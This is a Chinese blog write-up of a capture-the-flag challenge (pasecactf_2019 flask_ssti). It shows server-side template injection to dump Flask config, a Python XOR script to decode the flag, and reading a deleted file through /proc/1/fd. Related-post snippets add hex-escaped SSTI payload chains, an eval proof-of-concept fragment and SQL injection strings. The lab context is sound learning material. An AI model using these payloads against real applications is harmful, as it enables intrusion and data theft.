[pasecactf_2019]flask_ssti proc ssti config

已于 2023-12-13 16:53:39 修改
阅读量718 收藏 8
点赞数 7
分类专栏: BUUctf 文章标签: flask python 后端
于 2023-12-13 16:53:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64180167/article/details/134976379
版权

其实这个很简单

Linux的/proc/self/学习-CSDN博客

首先ssti 直接fenjing一把锁了

这里被加密后 存储在 config中了 然后我们去config中查看即可

{{config}}

可以获取到flag的值

-M7\x10w@d94\x02!`-\x0eL\x0c;\x07(DKO\r\x17!2R4\x02\rO\x0bsT#-\x1c`@Z\x1dG

然后就可以写代码解密

def encode(line, key, key2):
    return ''.join(chr(x ^ ord(line[x]) ^ ord(key[::-1][x]) ^ ord(key2[x])) for x in range(len(line)))

flag = "-M7\x10w@d94\x02!`-\x0eL\x0c;\x07(DKO\r\x17!2R4\x02\rO\x0bsT#-\x1c`@Z\x1dG"

flag = encode(flag, 'GQIS5EmzfZA1Ci8NslaoMxPXqrvFB7hYOkbg9y20W3', 'xwdFqMck1vA0pl7B8WO3DrGLma4sZ2Y6ouCPEHSQVT')

print(flag)

因为都是异或  异或的异或就是 原本 所以不需要修改

就可以输出flag

proc

还有另一个方法 存储在 proc中

首先我们可以执行命令了

查看一下进程 ps

发现app的进程在pid为1

我们去查看

ls /proc/1/fd

这里其实没有这么多 因为我靶场没有关 原本只有 1-5 所以我们开始访问 可以在3 获取到flag

这里的原理

fd是一个目录,里面包含着当前进程打开的每一个文件的描述符,然后虽然他把flag删掉了,但进程并没有关闭它,所以目录下 还是会有这个文件的文件描述符,通过这个文件描述符我们即可以得到被删除的文件的内容

双层小牛堡
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf pasecactf_2019]flask_ssti
qq_40800734的博客
06-29 2431
1.测试存在ssti 2.获取类型所属的对象,后面显示被过滤了,看了大佬的文章_'.这三个被过滤了,但可以用十六进制绕过 3.寻找基类 4.寻找可用引用 {{()["\x5f\x5fclass\x5f\x5f"]["\x5f\x5fbases\x5f\x5f"][0]["\x5f\x5fsubclasses\x5f\x5f"]()}} 5.接下来就是开始一系列利用了(基础不是很好,后面的待填坑)一些大佬的方法: 自己的一些总结:使用[]好像可以自动补.号 以下是等价的
[pasecactf_2019]flask_ssti
cjdgg的博客
07-05 2287
[pasecactf_2019]flask_ssti 进入题目后如下图所示 因为题目本身就提示ssti了,我也就直接尝试有没有过滤了 这里过滤了下划线,使用十六进制编码绕过,_编码后为\x5f, .过滤的话我们直接用[]包含绕过 这里过滤了单引号,我们用双引号绕过 这题过滤已经找完了,接下来是构造 相当于执行{{class}} 相当于执行{{class.bases[0]}} 相当于执行{{class.bases[0].subclasses()}} 下面贴一个脚本用来找可用类 import js
buuctf [pasecactf_2019]flask_ssti
CyhDl666的博客
03-18 1194
题目已经告诉是SSTI模板注入了 测试一下 做题时用""发现了过滤 fuzz一下 过滤了很多东西 想到去年打校赛自己未解出来的一题 结合题目提示 是个16进制转换 附上自己写的python脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(ssti) 将下面内容转化为16进制 __class__.
buuctf-[Flask]SSTI
m0_62094846的博客
04-22 1085
页面上只有Hello guest,源代码上也是什么都没有,抓包添加XFF也没有改变。 是要GET一个参数name,这个不好想到 顺便确定有SSTI漏洞 <加字母就会被过滤 Smarty中的方法也不能用了 获取eval函数并执行任意python代码的POC {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__i...
BUU刷题记录——5
weixin_43610673的博客
09-21 1451
October 2019 Twice SQL Injection 由题目名可知为二次注入 username =1' union select database() # username =1' union select group_concat(table_name) from information_schema.tables where table_schema='ctftraining' # username =1' union select group
pasecactf_2019_web_honey_shop
05-04
PASECA2019_Web_honey_shop 题目详情 PASECA CTF 2019 Web honey_shop Difficulty: Easy 考点 LFI Flask Cookie伪造 启动 docker-compose up -d open 题目说明 Flag位于app/flag.txt,Docker中位于/app/flag.txt。 ...
api.rar_API_IML语言_orwxh_python flask
09-23
语言为python,使用flask框架,一个简单的api示例
douban_flask_pythonflask豆瓣_python_
10-02
PYTHON 获得豆瓣电影榜单TOP250 爬虫升级版本
第三次课c3.zip_flask_flask网站_网站 python
09-23
使用python,flask框架搭建类似Instagram网站
BUUCTF--[pasecactf_2019]flask_ssti
qq_46263951的博客
08-12 523
根据题目我们可以知道这是一道Flask SSTI的题。 打开后允许我们输入东西,会返回用奇怪字符包裹的昵称。 我们试一下{{2*2}},然后返回4。这里存在这SSTI。 这里过滤了很多东西,就不在一一测试,使用十六进制进行绕过. #转16进制py脚本 code = "/proc/self/fd/1" ssti = "" length = len(code) for i in range(length): ssti += "\\x" + hex(ord(code[i]))[2:] print(
buuctf [Flask]SSTI
qq_1873822的博客
03-16 2541
漏洞简介 SSTI即服务端模版注入攻击。由于程序员代码编写不当,导致用户输入可以修改服务端模版的执行逻辑,从而造成XSS,任意文件读取,代码执行等一系列问题。 复现过程 访问http://node3.buuoj.cn:29153/?name={{2*2}} 说明SSTI漏洞存在。 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warni
Buuctf[Flask]SSTI 1
F1or_的博客
09-28 2645
最近CTF比赛里出了一道SSTI的题目,当时没有做出来,现在来学习下 SST是由于开发者的不恰当言语所造成 <html> <head> <title>SSTI_TEST</title> </head> <body> <h1>Hello, %s !</h1> </body> </html> 正确代码应是 <html> <head&g
[ctf]flask SSTI模板注入payload分类大全
qq_37301470的博客
11-20 774
看到一篇很好的文章 讲的很清楚 https://xz.aliyun.com/t/3679
关于flask的SSTI注入
Kr的博客
01-21 7124
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
python安装flask,flask框架,使用静态文件、模板、get和post请求
最新发布
qq_34631220的博客
06-11 551
模板文件存储的文件夹,可以不传,默认为 templates。静态文件存储的文件夹,可以不传,默认为 static。1.创建app.py文件。2.静态文件和模板使用。
利用flask + pymysql监测数据同步中的数据是否完整
qq969887453的博客
06-11 437
最近项目搞重构,将原有的系统拆分成了多个子系统。但是有数据表需要在不同系统中数据,同时为了解决项目性能最了一个很简单的方案,就是公共数据存在每个系统之中。分析这些表,这些表相比源数据表,表结构完全相同,除了名称加了MD前缀。/msp/api/download/ GET。参数:target_db_name 需要检查的数据库名称。target_db 目标数据库名称。tables 需要检查的表。参数:source_db 源数据库名称。2、自定义检查系统表数据。
Flask 学习笔记 总结
Jay17的博客
06-06 1335
Flask 学习笔记 总结
每日一题——Python实现PAT乙级1042 字符统计(举一反三+思想解读+逐步优化)
weixin_44915521的博客
06-09 1126
这些编程思想和哲学理念在编写高效、健壮的代码时至关重要。通过理解和应用这些原则,我们不仅能够写出性能更好的代码,还能在不同情况下做出更加明智的设计决策。通过理解和应用这些哲学和编程思想,可以在不同场景中灵活运用,写出更加高效、健壮和灵活的代码。评估需求:根据实际需求选择最合适的数据结构和算法。避免冗余:尽量避免不必要的重复计算和操作。权衡利弊:在空间和时间之间找到最佳平衡点。灵活应变:根据输入数据的特性,灵活使用动态数据结构和提前决策策略。
[rootersctf2019]i_<3_flask
04-09
不好意思,我是语言模型AI,无法直接回答该问题,但是我可以帮您翻译该问题的意思,该题目应该是一道CTF比赛中的题目,题目名称为"[rootersctf2019]i_<3_flask"。关于具体内容需要参加比赛的选手来解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值